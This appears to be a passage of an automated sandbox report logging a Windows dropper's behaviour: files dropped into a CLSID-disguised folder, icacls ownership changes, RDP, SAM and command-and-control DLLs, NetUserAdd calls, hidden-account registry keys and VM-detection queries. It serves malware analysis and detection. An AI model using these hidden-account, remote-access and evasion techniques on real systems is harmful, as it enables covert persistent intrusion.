Source: unknown Process created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl
Source: C:\Windows\System32\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 440 -p 7988 -ip 7988
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7988 -s 1128
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: unknown Process created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7988 -s 1128
Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samlib.dll
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeFile written: C:\Users\user\AppData\Local\Temp\wfpblk.ini
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exeStatic file information: File size 11950592 > 1048576
Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x8b1200
Source: file.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x100200
Source: Binary string: RfxVmt.pdb source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, T9229YlC.29.dr, update.pkg.18.dr
Source: Binary string: RfxVmt.pdbGCTL source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, T9229YlC.29.dr, update.pkg.18.dr
Source: rfxvmt.dll.29.drStatic PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCode function: 13_2_00007FF7E3CEFF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,13_2_00007FF7E3CEFF1F
Source: file.exeStatic PE information: section name: .didata
Source: lr75sq5smrngkif9fpn.exe.8.drStatic PE information: section name: .xdata
Source: yhar2he6rpt6n0h1w6rh.exe.8.drStatic PE information: section name: .xdata
Source: main.exe.18.drStatic PE information: section name: .xdata
Source: rdpctl.dll.29.drStatic PE information: section name: .xdata
Source: samctl.dll.29.drStatic PE information: section name: .xdata
Source: prgmgr.dll.29.drStatic PE information: section name: .xdata
Source: dwlmgr.dll.29.drStatic PE information: section name: .xdata
Source: cnccli.dll.29.drStatic PE information: section name: .xdata
Source: libi2p.dll.29.drStatic PE information: section name: .xdata
Source: evtsrv.dll.29.drStatic PE information: section name: .xdata
Source: termsrv32.dll.29.drStatic PE information: section name: .xdata
Source: UEptccWa.29.drStatic PE information: section name: .xdata
Source: nHqxqt5L.29.drStatic PE information: section name: .xdata
Source: fQQIqQM0.29.drStatic PE information: section name: .xdata
Source: x8eec9dQ.29.drStatic PE information: section name: .xdata
Source: miECvZvT.29.drStatic PE information: section name: .xdata
Source: TLbqzKsW.29.drStatic PE information: section name: .xdata
Source: e5xaOqBz.29.drStatic PE information: section name: .xdata
Source: VPIOcgIO.29.drStatic PE information: section name: .xdata
Source: C:\Users\user\Desktop\file.exeCode function: 6_2_032C120E pushfd ; retf 6_2_032C120F
Source: C:\Users\user\Desktop\file.exeCode function: 6_2_032DF262 push es; retf 6_2_032DF263
Source: C:\Users\user\Desktop\file.exeCode function: 6_2_032C6769 push esi; ret 6_2_032C676B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472B8 push rsp; ret 29_2_00007FFB227472B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472BC push rsp; ret 29_2_00007FFB227472BD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472C4 push rsp; ret 29_2_00007FFB227472C5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472CC push rsp; ret 29_2_00007FFB227472CD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472D0 push rsp; ret 29_2_00007FFB227472D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472D4 push rsp; ret 29_2_00007FFB227472D5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472D8 push rsp; ret 29_2_00007FFB227472D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472DC push rsp; ret 29_2_00007FFB227472DD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472E0 push rsp; ret 29_2_00007FFB227472E1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472E4 push rsp; ret 29_2_00007FFB227472E5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472E8 push rsp; ret 29_2_00007FFB227472E9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB2274726F push qword ptr [rsi]; ret 29_2_00007FFB22747275
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB2274727C push rsp; ret 29_2_00007FFB2274727D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227479B3 push qword ptr [00007FFB58747884h]; retf 29_2_00007FFB227479B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227479BB push qword ptr [00007FFB5874788Ch]; retf 29_2_00007FFB227479C1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227479C3 push qword ptr [00007FFB58747894h]; retf 29_2_00007FFB227479C9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227479CB push qword ptr [00007FFB5874789Ch]; retf 29_2_00007FFB227479D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227479D3 push qword ptr [00007FFB587478A4h]; retf 29_2_00007FFB227479D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227479E7 push qword ptr [00007FFB587478B8h]; retf 29_2_00007FFB227479ED
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227479EF push qword ptr [00007FFB587478C0h]; retf 29_2_00007FFB227479F5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227479F7 push qword ptr [00007FFB587478C8h]; retf 29_2_00007FFB227479FD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227479FF push qword ptr [00007FFB587478D0h]; retf 29_2_00007FFB22747A05
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB22747A07 push qword ptr [00007FFB587478D8h]; retf 29_2_00007FFB22747A0D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB22747A0F push qword ptr [00007FFB587478E0h]; retf 29_2_00007FFB22747A15
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB22747A17 push qword ptr [00007FFB297478E8h]; retf 29_2_00007FFB22747A1D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB2270870B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile,29_2_00007FFB2270870B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\UEptccWa
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\x8eec9dQ
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\VPIOcgIO
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\e5xaOqBz
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\nHqxqt5L
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\TLbqzKsW
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\T9229YlC
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\miECvZvT
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\fQQIqQM0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeFile created: C:\Users\user~1\AppData\Local\Temp\installer.log
Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FF7AABD1DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,29_2_00007FF7AABD1DBC
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

Hooking and other Techniques for Hiding and Protection

Source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000029.00000002.2531413531.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000029.00000002.2531413531.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: update.pkg.18.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: update.pkg.18.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\svchost.exe System information queried: FirmwareTableInformation
Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,29_2_00007FFB22737694
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,29_2_00007FFB22706078
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,29_2_00007FFB2273B648
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,29_2_00007FFB22762738
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,29_2_00007FFB23AB3058
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,29_2_00007FFB23AD4928
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,29_2_00007FFB23B01D98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5505
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4302
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8228
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1286
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7002
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2690
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Window / User API: threadDelayed 1401
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Window / User API: threadDelayed 6871
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\UEptccWa
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\x8eec9dQ
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\VPIOcgIO
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll
